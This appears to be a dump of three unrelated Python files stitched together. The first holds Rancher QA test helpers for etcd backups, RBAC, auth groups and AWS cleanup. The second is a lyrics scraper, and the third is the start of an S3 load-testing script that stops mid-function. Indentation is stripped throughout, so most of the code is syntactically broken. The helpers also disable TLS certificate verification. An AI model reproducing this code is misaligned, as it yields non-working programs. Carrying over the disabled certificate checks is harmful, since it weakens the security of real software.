etcdbackupdata = etcdbackups['data']
etcdbackupstate = etcdbackupdata[0]['state']
while etcdbackupstate != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
etcdbackups = cluster.etcdBackups(name=backupname)
assert len(etcdbackups) == 1
etcdbackupdata = etcdbackups['data']
etcdbackupstate = etcdbackupdata[0]['state']
print("BACKUP STATE")
print(etcdbackupstate)
return etcdbackupstate
def wait_for_backup_to_delete(cluster, backupname,
timeout=DEFAULT_TIMEOUT):
start = time.time()
etcdbackups = cluster.etcdBackups(name=backupname)
while len(etcdbackups) == 1:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for backup to be deleted")
time.sleep(.5)
etcdbackups = cluster.etcdBackups(name=backupname)
def validate_backup_create(namespace, backup_info, backup_mode=None):
p_client = namespace["p_client"]
ns = namespace["ns"]
cluster = namespace["cluster"]
name = random_test_name("default")
if not hasattr(cluster, 'rancherKubernetesEngineConfig'):
assert False, "Cluster is not of type RKE"
con = [{"name": "test1",
"image": TEST_IMAGE}]
backup_info["workload"] = p_client.create_workload(name=name,
containers=con,
namespaceId=ns.id,
daemonSetConfig={})
validate_workload(p_client, backup_info["workload"], "daemonSet", ns.name,
len(get_schedulable_nodes(cluster)))
host = "test" + str(random_int(10000, 99999)) + ".com"
namespace["host"] = host
path = "/name.html"
rule = {"host": host,
"paths": [{"workloadIds": [backup_info["workload"].id],
"targetPort": TEST_IMAGE_PORT}]}
p_client.create_ingress(name=name,
namespaceId=ns.id,
rules=[rule])
validate_ingress(p_client, cluster, [backup_info["workload"]], host, path)
# Perform Backup
backup = cluster.backupEtcd()
backup_info["backupname"] = backup['metadata']['name']
wait_for_backup_to_active(cluster, backup_info["backupname"])
# Get all the backup info
etcdbackups = cluster.etcdBackups(name=backup_info["backupname"])
backup_info["etcdbackupdata"] = etcdbackups['data']
backup_info["backup_id"] = backup_info["etcdbackupdata"][0]['id']
if backup_mode == "s3":
backupfileurl = backup_info["etcdbackupdata"][0]['filename']
# Check the backup filename exists in S3
parseurl = urlparse(backupfileurl)
backup_info["backupfilename"] = os.path.basename(parseurl.path)
backup_found = AmazonWebServices().s3_backup_check(
backup_info["backupfilename"])
assert backup_found, "the backup was not found in the S3 bucket"
elif backup_mode == 'filesystem':
for node in namespace['nodes']:
if 'etcd' not in node.roles:
continue
get_filesystem_snapshots = 'ls /opt/rke/etcd-snapshots'
response = node.execute_command(get_filesystem_snapshots)[0]
assert backup_info["etcdbackupdata"][0]['filename'] in response, \
"The filename doesn't match any of the files locally"
return namespace, backup_info
def validate_backup_restore(namespace, backup_info):
p_client = namespace["p_client"]
ns = namespace["ns"]
client = get_user_client()
cluster = namespace["cluster"]
name = random_test_name("default")
host = namespace["host"]
path = "/name.html"
con = [{"name": "test1",
"image": TEST_IMAGE}]
# Create workload after backup
testworkload = p_client.create_workload(name=name,
containers=con,
namespaceId=ns.id)
validate_workload(p_client, testworkload, "deployment", ns.name)
# Perform Restore
cluster.restoreFromEtcdBackup(etcdBackupId=backup_info["backup_id"])
# After restore, validate cluster
validate_cluster(client, cluster, intermediate_state="updating",
check_intermediate_state=True,
skipIngresscheck=False)
# Verify the ingress created before taking the snapshot
validate_ingress(p_client, cluster, [backup_info["workload"]], host, path)
# Verify the workload created after getting a snapshot does not exist
# after restore
workload_list = p_client.list_workload(uuid=testworkload.uuid).data
print(len(workload_list))
assert len(workload_list) == 0, "workload shouldn't exist after restore"
return namespace, backup_info
def validate_backup_delete(namespace, backup_info, backup_mode=None):
client = get_user_client()
cluster = namespace["cluster"]
client.delete(
cluster.etcdBackups(name=backup_info["backupname"])['data'][0]
)
wait_for_backup_to_delete(cluster, backup_info["backupname"])
assert len(cluster.etcdBackups(name=backup_info["backupname"])) == 0, \
"backup shouldn't be listed in the Cluster backups"
if backup_mode == "s3":
# Check the backup reference is deleted in Rancher and S3
backup_found = AmazonWebServices().s3_backup_check(
backup_info["backupfilename"])
assert_message = "The backup should't exist in the S3 bucket"
assert backup_found is False, assert_message
elif backup_mode == 'filesystem':
for node in namespace['nodes']:
if 'etcd' not in node.roles:
continue
get_filesystem_snapshots = 'ls /opt/rke/etcd-snapshots'
response = node.execute_command(get_filesystem_snapshots)[0]
filename = backup_info["etcdbackupdata"][0]['filename']
assert filename not in response, \
"The file still exist in the filesystem"
def apply_crd(ns, file, kubectl_context):
return execute_kubectl_cmd('apply -f ' + file + ' -n ' + ns.name,
json_out=False, stderr=True,
kubeconfig=kubectl_context).decode("ascii")
def get_crd(ns, crd_name, kubectl_context):
return execute_kubectl_cmd('get ' + crd_name + ' -n ' + ns.name,
json_out=False, stderr=True,
kubeconfig=kubectl_context).decode("ascii")
def delete_crd(ns, file, kubectl_context):
return execute_kubectl_cmd('delete -f ' + file + ' -n ' + ns.name,
json_out=False, stderr=True,
kubeconfig=kubectl_context).decode("ascii")
def prepare_auth_data():
name = \
os.path.join(os.path.dirname(os.path.realpath(__file__)) + "/resource",
AUTH_PROVIDER.lower() + ".json")
with open(name) as reader:
auth_data = reader.read()
raw = json.loads(auth_data).get("nested_group_info")
nested_group["auth_info"] = raw.copy()
nested_group["users"] = raw.get("users")
raw.pop("users")
nested_group["group_dic"] = raw
nested_group["groups"] = raw.keys()
def is_nested():
""" check if the provided groups are nested groups,
return True if at least one of the groups contains other groups
"""
count = 0
for user, group in nested_group["group_dic"].items():
if len(group) == 0:
count += 1
if count < len(nested_group["group_dic"]):
return True
return False
def get_group(nested=False):
""" return a group or a nested group"""
if nested:
# return the name of a group that contains at least one other group
for item in nested_group["groups"]:
if len(nested_group["group_dic"].get(item).get("users")) == 0:
pass
sub_groups = nested_group["group_dic"].get(item).get("groups")
if len(sub_groups) == 0:
pass
for g in sub_groups:
if len(nested_group["group_dic"].get(g).get("users")) > 0:
return item
assert False, "cannot find any valid nested group"
else:
# return the name of a group that has at least one direct user
for group in nested_group["groups"]:
if len(nested_group["group_dic"].get(group).get("users")) > 0:
return group
assert False, "cannot find any valid non-nested group"
def get_user_by_group(group, nested=False):
""" return the list of uses in the group or nested group
if nested is False, return the direct users in the group;
otherwise, return all users including those from nested groups
"""
def get_user_in_nested_group(group, source):
if group == "":
return []
users = source["group_dic"].get(group).get("users")
for sub_group in source["group_dic"].get(group).get("groups"):
temp = get_user_in_nested_group(sub_group, source)
for user in temp:
if user not in users:
users.append(user)
return users
if nested:
users = get_user_in_nested_group(group, nested_group)
assert len(users) > 0, "no user in the group"
else:
users = nested_group["group_dic"].get(group).get("users")
assert users is not None, "no user in the group"
print("group: {}, users: {}".format(group, users))
return users
def get_a_group_and_a_user_not_in_it(nested=False):
""" return a group or a nested group and a user that is not in the group"""
all_users = nested_group["users"]
for group in nested_group["groups"]:
group_users = get_user_by_group(group, nested)
for user in all_users:
if user not in group_users:
print("group: {}, user not in it: {}".format(group, user))
return group, user
assert False, "cannot find a group and a user not in it"
def get_group_principal_id(group_name, token=ADMIN_TOKEN, expected_status=200):
""" get the group's principal id from the auth provider"""
headers = {'Authorization': 'Bearer ' + token}
r = requests.post(CATTLE_AUTH_PRINCIPAL_URL,
json={'name': group_name,
'principalType': 'group',
'responseType': 'json'},
verify=False, headers=headers)
assert r.status_code == expected_status
return r.json()['data'][0]["id"]
def login_as_auth_user(username, password, login_url=LOGIN_AS_AUTH_USER_URL):
""" login with the user account from the auth provider,
and return the user token"""
r = requests.post(login_url, json={
'username': username,
'password': password,
'responseType': 'json',
}, verify=False)
assert r.status_code in [200, 201]
return r.json()
def validate_service_discovery(workload, scale,
p_client=None, ns=None, testclient_pods=None):
expected_ips = []
pods = p_client.list_pod(workloadId=workload["id"]).data
assert len(pods) == scale
for pod in pods:
expected_ips.append(pod["status"]["podIp"])
host = '{0}.{1}.svc.cluster.local'.format(workload.name, ns.id)
for pod in testclient_pods:
validate_dns_entry(pod, host, expected_ips)
def auth_get_project():
return auth_rbac_data["project"]
def auth_get_namespace():
return auth_rbac_data["namespace"]
def auth_get_user_token(username):
if username in auth_rbac_data["users"].keys():
return auth_rbac_data["users"][username].token
return None
def add_role_to_user(user, role):
"""this function adds a user from the auth provider to given cluster"""
admin_client, cluster = get_global_admin_client_and_cluster()
project = auth_get_project()
ns = auth_get_namespace()
if not (project and ns):
project, ns = create_project_and_ns(ADMIN_TOKEN, cluster,
random_test_name("p-test-auth"))
auth_rbac_data["project"] = project
auth_rbac_data["namespace"] = ns
if role in [PROJECT_OWNER, PROJECT_MEMBER, PROJECT_READ_ONLY]:
assign_members_to_project(admin_client, user, project, role)
else:
assign_members_to_cluster(admin_client, user, cluster, role)
auth_rbac_data["users"][user.username] = user
def auth_resource_cleanup():
""" remove the project and namespace created for the AUTH tests"""
client, cluster = get_global_admin_client_and_cluster()
client.delete(auth_rbac_data["project"])
auth_rbac_data["project"] = None
auth_rbac_data["ns"] = None
for username, user in auth_rbac_data["users"].items():
user_crtbs = client.list_cluster_role_template_binding(userId=user.id)
for crtb in user_crtbs:
client.delete(crtb)
class WebsocketLogParse:
"""
the class is used for receiving and parsing the message
received from the websocket
"""
def __init__(self):
self.lock = Lock()
self._last_message = ''
def receiver(self, socket, skip, b64=True):
"""
run a thread to receive and save the message from the web socket
:param socket: the socket connection
:param skip: if True skip the first char of the received message
"""
        while socket.connected:
try:
data = socket.recv()
# the message from the kubectl contains an extra char
if skip:
data = data[1:]
if len(data) < 5:
pass
if b64:
data = base64.b64decode(data).decode()
self.lock.acquire()
self._last_message += data
self.lock.release()
except websocket.WebSocketConnectionClosedException:
print("Connection closed")
break
except websocket.WebSocketProtocolException as wpe:
print("Error: {}".format(wpe))
break
@staticmethod
def start_thread(target, args):
thread = Thread(target=target, args=args)
thread.daemon = True
thread.start()
time.sleep(1)
@property
def last_message(self):
return self._last_message
@last_message.setter
def last_message(self, value):
self.lock.acquire()
self._last_message = value
self.lock.release()
def wait_for_cluster_delete(client, cluster_name, timeout=DEFAULT_TIMEOUT):
start = time.time()
cluster = client.list_cluster(name=cluster_name).data
cluster_count = len(cluster)
while cluster_count != 0:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for cluster to get deleted")
time.sleep(.5)
cluster = client.list_cluster(name=cluster_name).data
cluster_count = len(cluster)
def create_connection(url, subprotocols):
"""
    create a websocket connection and check if it is connected
:param url: the url to connect to
:param subprotocols: the list of subprotocols
:return:
"""
ws = websocket.create_connection(
url=url,
sslopt={"cert_reqs": ssl.CERT_NONE},
subprotocols=subprotocols,
timeout=10,
cookie="R_SESS=" + USER_TOKEN
)
assert ws.connected, "failed to build the websocket"
return ws
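# Illustrative sketch (hypothetical URL and subprotocol): wiring
# create_connection() to a WebsocketLogParse receiver thread so that the
# streamed output accumulates in last_message.
def _example_stream_ws_output(ws_url):
    ws = create_connection(ws_url, ["base64.channel.k8s.io"])
    parser = WebsocketLogParse()
    WebsocketLogParse.start_thread(parser.receiver, (ws, True))
    time.sleep(2)
    ws.close()
    return parser.last_message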
def wait_for_hpa_to_active(client, hpa, timeout=DEFAULT_TIMEOUT):
start = time.time()
hpalist = client.list_horizontalPodAutoscaler(uuid=hpa.uuid).data
assert len(hpalist) == 1
hpa = hpalist[0]
while hpa.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
hpas = client.list_horizontalPodAutoscaler(uuid=hpa.uuid).data
assert len(hpas) == 1
hpa = hpas[0]
return hpa
def create_pv_pvc(client, ns, nfs_ip, cluster_client):
pv_object = create_pv(cluster_client, nfs_ip)
pvc_name = random_test_name("pvc")
pvc_config = {"accessModes": ["ReadWriteOnce"],
"name": pvc_name,
"volumeId": pv_object.id,
"namespaceId": ns.id,
"storageClassId": "",
"resources": {"requests": {"storage": "10Gi"}}
}
pvc_object = client.create_persistent_volume_claim(pvc_config)
pvc_object = wait_for_pvc_to_be_bound(client, pvc_object, timeout=300)
return pv_object, pvc_object
def create_pv(client, nfs_ip):
pv_name = random_test_name("pv")
pv_config = {"type": "persistentVolume",
"accessModes": ["ReadWriteOnce"],
"name": pv_name,
"nfs": {"readOnly": "false",
"type": "nfsvolumesource",
"path": NFS_SERVER_MOUNT_PATH,
"server": nfs_ip
},
"capacity": {"storage": "50Gi"}
}
pv_object = client.create_persistent_volume(pv_config)
capacitydict = pv_object['capacity']
assert capacitydict['storage'] == '50Gi'
assert pv_object['type'] == 'persistentVolume'
return pv_object
def delete_resource_in_AWS_by_prefix(resource_prefix):
"""
:param resource_prefix: the prefix of resource name
:return: None
"""
# delete nodes of both local and custom clusters
node_filter = [{
'Name': 'tag:Name',
'Values': [resource_prefix + "-*"]
}]
nodes = AmazonWebServices().get_nodes(filters=node_filter)
if nodes is None:
print("deleting the following instances: None")
else:
print("deleting the following instances: {}"
.format([node.public_ip_address for node in nodes]))
AmazonWebServices().delete_nodes(nodes)
# delete load balancer and target groups
tg_list = []
lb_list = []
lb_names = [resource_prefix + '-nlb',
resource_prefix + '-k3s-nlb',
resource_prefix + '-internal-nlb']
for name in lb_names:
lb_arn = AmazonWebServices().get_lb(name)
if lb_arn is not None:
lb_list.append(lb_arn)
res = AmazonWebServices().get_target_groups(lb_arn)
tg_list.extend(res)
print("deleting the following load balancers: {}".format(lb_list))
print("deleting the following target groups: {}".format(tg_list))
for lb in lb_list:
AmazonWebServices().delete_lb(lb)
for tg in tg_list:
AmazonWebServices().delete_target_group(tg)
# delete rds
db_name = resource_prefix + "-db"
print("deleting the database (if it exists): {}".format(db_name))
AmazonWebServices().delete_db(db_name)
# delete the route 53 record
route53_names = [resource_prefix + ".qa.rancher.space.",
resource_prefix + "-internal.qa.rancher.space."]
for name in route53_names:
print("deleting the route53 record (if it exists): {}".format(name))
AmazonWebServices().delete_route_53_record(name)
print("deletion is done")
return None
def configure_cis_requirements(aws_nodes, profile, node_roles, client,
cluster):
i = 0
if profile == 'rke-cis-1.4':
for aws_node in aws_nodes:
aws_node.execute_command("sudo sysctl -w vm.overcommit_memory=1")
aws_node.execute_command("sudo sysctl -w kernel.panic=10")
aws_node.execute_command("sudo sysctl -w kernel.panic_on_oops=1")
if node_roles[i] == ["etcd"]:
aws_node.execute_command("sudo useradd etcd")
docker_run_cmd = \
get_custom_host_registration_cmd(client,
cluster,
node_roles[i],
aws_node)
aws_node.execute_command(docker_run_cmd)
i += 1
elif profile == 'rke-cis-1.5':
for aws_node in aws_nodes:
aws_node.execute_command("sudo sysctl -w vm.overcommit_memory=1")
aws_node.execute_command("sudo sysctl -w kernel.panic=10")
aws_node.execute_command("sudo sysctl -w vm.panic_on_oom=0")
aws_node.execute_command("sudo sysctl -w kernel.panic_on_oops=1")
aws_node.execute_command("sudo sysctl -w "
"kernel.keys.root_maxbytes=25000000")
if node_roles[i] == ["etcd"]:
aws_node.execute_command("sudo groupadd -g 52034 etcd")
aws_node.execute_command("sudo useradd -u 52034 -g 52034 etcd")
docker_run_cmd = \
get_custom_host_registration_cmd(client,
cluster,
node_roles[i],
aws_node)
aws_node.execute_command(docker_run_cmd)
i += 1
time.sleep(5)
cluster = validate_cluster_state(client, cluster)
    # wait for the workloads under the System project to become active
time.sleep(20)
if profile == 'rke-cis-1.5':
create_kubeconfig(cluster)
network_policy_file = DATA_SUBDIR + "/default-allow-all.yaml"
account_update_file = DATA_SUBDIR + "/account_update.yaml"
items = execute_kubectl_cmd("get namespaces -A")["items"]
all_ns = [item["metadata"]["name"] for item in items]
for ns in all_ns:
execute_kubectl_cmd("apply -f {0} -n {1}".
format(network_policy_file, ns))
namespace = ["default", "kube-system"]
for ns in namespace:
execute_kubectl_cmd('patch serviceaccount default'
' -n {0} -p "$(cat {1})"'.
format(ns, account_update_file))
return cluster
def get_node_details(cluster, client):
"""
    lists the nodes from the cluster and returns the first worker node
    (this cluster is expected to have only one).
    :return: client and node object
"""
create_kubeconfig(cluster)
nodes = client.list_node(clusterId=cluster.id).data
assert len(nodes) > 0
for node in nodes:
if node.worker:
break
return client, node
def create_service_account_configfile():
client, cluster = get_user_client_and_cluster()
create_kubeconfig(cluster)
name = random_name()
# create a service account
execute_kubectl_cmd(cmd="create sa {}".format(name), json_out=False)
# get the ca and token
res = execute_kubectl_cmd(cmd="get secret -o name", json_out=False)
secret_name = ""
for item in res.split("\n"):
if name in item:
secret_name = item.split("/")[1]
break
res = execute_kubectl_cmd(cmd="get secret {}".format(secret_name))
ca = res["data"]["ca.crt"]
token = res["data"]["token"]
token = base64.b64decode(token).decode()
server = None
nodes = client.list_node(clusterId=cluster.id).data
for node in nodes:
if node.controlPlane:
server = "https://" + node.externalIpAddress + ":6443"
break
assert server is not None, 'failed to get the public ip of control plane'
config = """
apiVersion: v1
kind: Config
clusters:
- name: test-cluster
cluster:
server: {server}
certificate-authority-data: {ca}
contexts:
- name: default-context
context:
cluster: test-cluster
namespace: default
user: test-user
current-context: default-context
users:
- name: test-user
user:
token: {token}
"""
config = config.format(server=server, ca=ca, token=token)
config_file = os.path.join(os.path.dirname(os.path.realpath(__file__)),
name + ".yaml")
with open(config_file, "w") as file:
file.write(config)
return name
def rbac_test_file_reader(file_path=None):
"""
    This method generates test cases from an input file and returns a result
    that can be used to parametrize pytest cases
:param file_path: the path to the JSON file for test cases
:return: a list of tuples of
(cluster_role, command, authorization, service account name)
"""
if test_rbac_v2 == "False":
return []
if file_path is None:
pytest.fail("no file is provided")
with open(file_path) as reader:
test_cases = json.loads(reader.read().replace("{resource_root}",
DATA_SUBDIR))
output = []
for cluster_role, checks in test_cases.items():
# create a service account for each role
name = create_service_account_configfile()
# create the cluster role binding
cmd = "create clusterrolebinding {} " \
"--clusterrole {} " \
"--serviceaccount {}".format(name, cluster_role,
"default:" + name)
execute_kubectl_cmd(cmd, json_out=False)
for command in checks["should_pass"]:
output.append((cluster_role, command, True, name))
for command in checks["should_fail"]:
output.append((cluster_role, command, False, name))
return output
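# Illustrative sketch (hypothetical role and commands): rbac_test_file_reader()
# expects the JSON file to map a cluster role to the kubectl commands that
# should and should not be authorized; "{resource_root}" inside a command is
# replaced with DATA_SUBDIR before the cases are generated.
_EXAMPLE_RBAC_V2_TEST_CASES = {
    "view": {
        "should_pass": ["get pods -n default"],
        "should_fail": ["delete pod -n default --all"]
    }
}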
def validate_cluster_role_rbac(cluster_role, command, authorization, name):
"""
    This method runs the kubectl command with the given service account's
    kubeconfig and checks whether the cluster role bound to that service
    account grants or denies the expected permission
:param cluster_role: the cluster role
:param command: the kubectl command to run
:param authorization: if the service account has the permission: True/False
:param name: the name of the service account, cluster role binding, and the
kubeconfig file
"""
config_file = os.path.join(os.path.dirname(os.path.realpath(__file__)),
name + ".yaml")
result = execute_kubectl_cmd(command,
json_out=False,
kubeconfig=config_file,
stderr=True).decode('utf_8')
if authorization:
assert "Error from server (Forbidden)" not in result, \
"{} should have the authorization to run {}".format(cluster_role,
command)
else:
assert "Error from server (Forbidden)" in result, \
"{} should NOT have the authorization to run {}".format(
cluster_role, command)
def wait_until_app_v2_deployed(client, app_name, timeout=DEFAULT_APP_V2_TIMEOUT):
"""
List all installed apps and check for the state of "app_name" to see
if it == "deployed"
:param client: cluster client for the user
:param app_name: app which is being installed
:param timeout: time for the app to come to Deployed state
:return:
"""
start = time.time()
app = client.list_catalog_cattle_io_app()
while True:
app_list = []
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to Deployed")
time.sleep(.5)
for app in app["data"]:
app_list.append(app["metadata"]["name"])
if app["metadata"]["name"] == app_name:
if app["status"]["summary"]["state"] == "deployed":
return app_list
app = client.list_catalog_cattle_io_app()
return
def wait_until_app_v2_uninstall(client, app_name, timeout=DEFAULT_APP_V2_TIMEOUT):
"""
    list all installed apps and search for "app_name" in the list;
    if app_name is NOT in the list, the app has been uninstalled successfully
    :param client: cluster client for the user
    :param app_name: app which is being uninstalled
    :param timeout: time for app to be uninstalled
"""
start = time.time()
app = client.list_catalog_cattle_io_app()
while True:
app_list = []
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to Uninstalled")
time.sleep(.5)
for app in app["data"]:
app_list.append(app["metadata"]["name"])
if app_name not in app_list:
return app_list
app = client.list_catalog_cattle_io_app()
return
def check_v2_app_and_uninstall(client, chart_name):
app = client.list_catalog_cattle_io_app()
for app in app["data"]:
if app["metadata"]["name"] == chart_name:
response = client.action(obj=app, action_name="uninstall")
app_list = wait_until_app_v2_uninstall(client, chart_name)
assert chart_name not in app_list, \
"App has not uninstalled"
def update_and_validate_kdm(kdm_url, admin_token=ADMIN_TOKEN,
rancher_api_url=CATTLE_API_URL):
print("Updating KDM to use {}".format(kdm_url))
header = {'Authorization': 'Bearer ' + admin_token}
api_url = rancher_api_url + "/settings/rke-metadata-config"
kdm_json = {
"name": "rke-metadata-config",
"value": json.dumps({
"refresh-interval-minutes": "1440",
"url": kdm_url
})
}
r = requests.put(api_url, verify=False, headers=header, json=kdm_json)
r_content = json.loads(r.content)
assert r.ok
assert r_content['name'] == kdm_json['name']
assert r_content['value'] == kdm_json['value']
time.sleep(2)
# Refresh Kubernetes Metadata
kdm_refresh_url = rancher_api_url + "/kontainerdrivers?action=refresh"
response = requests.post(kdm_refresh_url, verify=False, headers=header)
assert response.ok
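# Illustrative sketch (hypothetical KDM URL): point Rancher at a
# kontainer-driver-metadata branch and trigger a refresh.
def _example_switch_kdm():
    update_and_validate_kdm(
        "https://releases.rancher.com/kontainer-driver-metadata/"
        "dev-v2.6/data.json")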
|
gather.py
|
import argparse
import os
import urllib2
import re
import codecs
from threading import Thread
from HTMLParser import HTMLParser
DOMAIN = "songmeanings.com/"
ARTIST_PATH = 'artist/view/songs/'
def start_new_thread(task, arg):
thread = Thread(target=task, args=(arg,))
thread.start()
def write_to_file(path, data):
output_file = codecs.open(path, 'a', 'utf_8')
output_file.write(data.encode('utf-8'))
output_file.write("\n")
output_file.close()
def get_url(path, arg = ""):
return 'http://' + DOMAIN + path + arg
def get_page_content(url):
response = urllib2.urlopen(url)
return response.read()
class SongPageParser(HTMLParser):
record = False
lyrics = ""
output_path = ""
def handle_starttag(self, tag, attrs):
for attr in attrs:
if attr[0] == "class" and attr[1].find('lyric-box') != -1:
self.record = True
if attr[0] == "id" and attr[1].find('lyrics-edit') != -1:
self.record = False
write_to_file(self.output_path, self.lyrics)
self.lyrics = ""
def handle_data(self, data):
if self.record:
self.lyrics += re.sub(r'[^\x00-\x7F]+', '\'', data.lstrip()) + "\n"
class ArtistPageParser(HTMLParser):
match = 0
url = ""
title = ""
output_path = ""
def handle_starttag(self, tag, attrs):
href = None
for attr in attrs:
if attr[0] == "id" and attr[1].find('lyric-') != -1:
self.match += 1
if attr[0] == "href" and attr[1].find(DOMAIN) != -1:
self.match += 1
href = attr[1]
if self.match > 1 and href is not None:
self.url = href[href.find(DOMAIN) + len(DOMAIN):]
def handle_endtag(self, tag):
self.match = 0
def handle_data(self, data):
if self.match > 1:
self.title = data
html = get_page_content(get_url(self.url))
song_parser = SongPageParser()
song_parser.output_path = self.output_path
start_new_thread(song_parser.feed, html)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--output_file', type=str, required=True)
parser.add_argument('--artists', type=str, required=True)
args = parser.parse_args()
output_file = args.output_file
artists = args.artists.replace(' ', '').split(',')
try:
os.remove(output_file)
except OSError:
print "The output file doesn't exist, creating it"
print "Gathering lyrics..."
for i, artist in enumerate(artists):
html = get_page_content(get_url(ARTIST_PATH, artist))
artist_parser = ArtistPageParser()
artist_parser.output_path = output_file
artist_parser.feed(html)
print "Progress: {}%".format(((i + 1) * 100) / len(artists))
print "Lyrics saved in {}".format(output_file)
if __name__ == "__main__":
main()
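# Illustrative invocation (hypothetical artist ids, appended to
# songmeanings.com/artist/view/songs/):
#   python gather.py --output_file lyrics.txt --artists 137994,1062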
|
run.py
|
#!/usr/bin/python
# -*- coding:utf-8 -*-
import sys
import os
import time
import math
import random
import logging
import logging.config
import datetime
import hashlib
import base64
import multiprocessing
import results
import Util
import s3PyCmd
import myLib.cloghandler
class User:
doc = """
    This is the user class; it holds a username and its AK/SK credentials
"""
def __init__(self, username, ak, sk):
self.username = username
self.ak = ak
self.sk = sk
def read_config(config_file='config.dat'):
"""
    parse "key = value" lines from the config file into the global CONFIG dict
    :rtype : None
    :param config_file: string
"""
try:
f = open(config_file, 'r')
lines = f.readlines()
for line in lines:
line = line.strip()
if line and line[0] != '#':
CONFIG[line[:line.find('=')].strip()] = line[line.find('=') + 1:].strip()
else:
continue
f.close()
CONFIG['OSCs'] = CONFIG['OSCs'].replace(' ', '').replace(',,', ',')
if CONFIG['OSCs'][-1:] == ',':
CONFIG['OSCs'] = CONFIG['OSCs'][:-1]
if CONFIG['IsHTTPs'].lower() == 'true':
CONFIG['IsHTTPs'] = True
else:
CONFIG['IsHTTPs'] = False
CONFIG['ConnectTimeout'] = int(CONFIG['ConnectTimeout'])
if int(CONFIG['ConnectTimeout']) < 5:
CONFIG['ConnectTimeout'] = 5
if CONFIG['LongConnection'].lower() == 'true':
CONFIG['LongConnection'] = True
else:
CONFIG['LongConnection'] = False
if CONFIG['UseDomainName'].lower() == 'true':
CONFIG['UseDomainName'] = True
            # If a domain name is used, OSCs is set to the domain name
CONFIG['OSCs'] = CONFIG['DomainName']
else:
CONFIG['UseDomainName'] = False
if CONFIG['VirtualHost'].lower() == 'true':
CONFIG['VirtualHost'] = True
else:
CONFIG['VirtualHost'] = False
if CONFIG['ObjectLexical'].lower() == 'true':
CONFIG['ObjectLexical'] = True
else:
CONFIG['ObjectLexical'] = False
if CONFIG['CalHashMD5'].lower() == 'true':
CONFIG['CalHashMD5'] = True
else:
CONFIG['CalHashMD5'] = False
CONFIG['Testcase'] = int(CONFIG['Testcase'])
CONFIG['Users'] = int(CONFIG['Users'])
CONFIG['UserStartIndex'] = int(CONFIG['UserStartIndex'])
CONFIG['ThreadsPerUser'] = int(CONFIG['ThreadsPerUser'])
CONFIG['Threads'] = CONFIG['Users'] * CONFIG['ThreadsPerUser']
CONFIG['RequestsPerThread'] = int(CONFIG['RequestsPerThread'])
CONFIG['BucketsPerUser'] = int(CONFIG['BucketsPerUser'])
if CONFIG['copyDstObjFiexed'] and '/' not in CONFIG['copyDstObjFiexed']:
CONFIG['copyDstObjFiexed'] = ''
if CONFIG['copySrcObjFixed'] and '/' not in CONFIG['copySrcObjFixed']:
CONFIG['copySrcObjFixed'] = ''
CONFIG['ObjectsPerBucketPerThread'] = int(CONFIG['ObjectsPerBucketPerThread'])
CONFIG['DeleteObjectsPerRequest'] = int(CONFIG['DeleteObjectsPerRequest'])
CONFIG['PartsForEachUploadID'] = int(CONFIG['PartsForEachUploadID'])
if CONFIG['ConcurrentUpParts'].lower() == 'true':
CONFIG['ConcurrentUpParts'] = True
if CONFIG['PartsForEachUploadID'] % CONFIG['ThreadsPerUser']:
if CONFIG['PartsForEachUploadID'] < CONFIG['ThreadsPerUser']:
CONFIG['PartsForEachUploadID'] = CONFIG['ThreadsPerUser']
else:
CONFIG['PartsForEachUploadID'] = int(
round(1.0 * CONFIG['PartsForEachUploadID'] / CONFIG['ThreadsPerUser']) * CONFIG[
'ThreadsPerUser'])
logging.info('change PartsForEachUploadID to %d' % CONFIG['PartsForEachUploadID'])
else:
CONFIG['ConcurrentUpParts'] = False
CONFIG['PutTimesForOneObj'] = int(CONFIG['PutTimesForOneObj'])
CONFIG['MixLoopCount'] = int(CONFIG['MixLoopCount'])
if CONFIG['RunSeconds']:
CONFIG['RunSeconds'] = int(CONFIG['RunSeconds'])
if CONFIG['RecordDetails'].lower() == 'true':
CONFIG['RecordDetails'] = True
else:
CONFIG['RecordDetails'] = False
CONFIG['StatisticsInterval'] = int(CONFIG['StatisticsInterval'])
if CONFIG['BadRequestCounted'].lower() == 'true':
CONFIG['BadRequestCounted'] = True
else:
CONFIG['BadRequestCounted'] = False
if CONFIG['AvoidSinBkOp'].lower() == 'true':
CONFIG['AvoidSinBkOp'] = True
else:
CONFIG['AvoidSinBkOp'] = False
if CONFIG['PrintProgress'].lower() == 'true':
CONFIG['PrintProgress'] = True
else:
CONFIG['PrintProgress'] = False
if not ('processID' in CONFIG['ObjectNamePartten'] and 'ObjectNamePrefix' in CONFIG[
'ObjectNamePartten'] and 'Index' in CONFIG['ObjectNamePartten']):
            raise Exception('processID, ObjectNamePrefix and Index must all appear in the ObjectNamePartten config item')
except Exception, e:
print '[ERROR] Read config file %s error: %s' % (config_file, e)
sys.exit()
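# Illustrative config.dat fragment (hypothetical values): lines starting with
# '#' are ignored and everything else is parsed as "key = value" into CONFIG.
#   OSCs = 192.168.0.11,192.168.0.12
#   IsHTTPs = false
#   ConnectTimeout = 10
#   Users = 2
#   ThreadsPerUser = 4
#   RequestsPerThread = 100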
def read_users():
"""
load users.dat
"""
global USERS, CONFIG
index = -1
try:
with open('./users.dat', 'r') as fd:
for line in fd:
if not line:
continue
index += 1
if index >= CONFIG['UserStartIndex'] and len(USERS) <= CONFIG['Users']:
user_info = line.strip()
user = User(user_info.split(',')[0], user_info.split(',')[1], user_info.split(',')[2])
USERS.append(user)
fd.close()
logging.debug("load user file end")
except Exception, data:
print "\033[1;31;40m[ERROR]\033[0m Load users Error, check file users.dat. Use iamPyTool.py to create users [%r]" % (
data)
logging.error(
'Load users Error, check file users.dat. Use iamPyTool.py to create users')
sys.exit()
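# Illustrative users.dat line (hypothetical credentials): one user per line,
# formatted as "username,access_key,secret_key", e.g.
#   user0001,AKEXAMPLE0001,SKEXAMPLESECRET0001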
def list_user_buckets(process_id, user, conn, result_queue):
request_type = 'ListUserBuckets'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], virtual_host=CONFIG['VirtualHost'],
domain_name=CONFIG['DomainName'], region=CONFIG['Region'])
i = 0
while i < CONFIG['RequestsPerThread']:
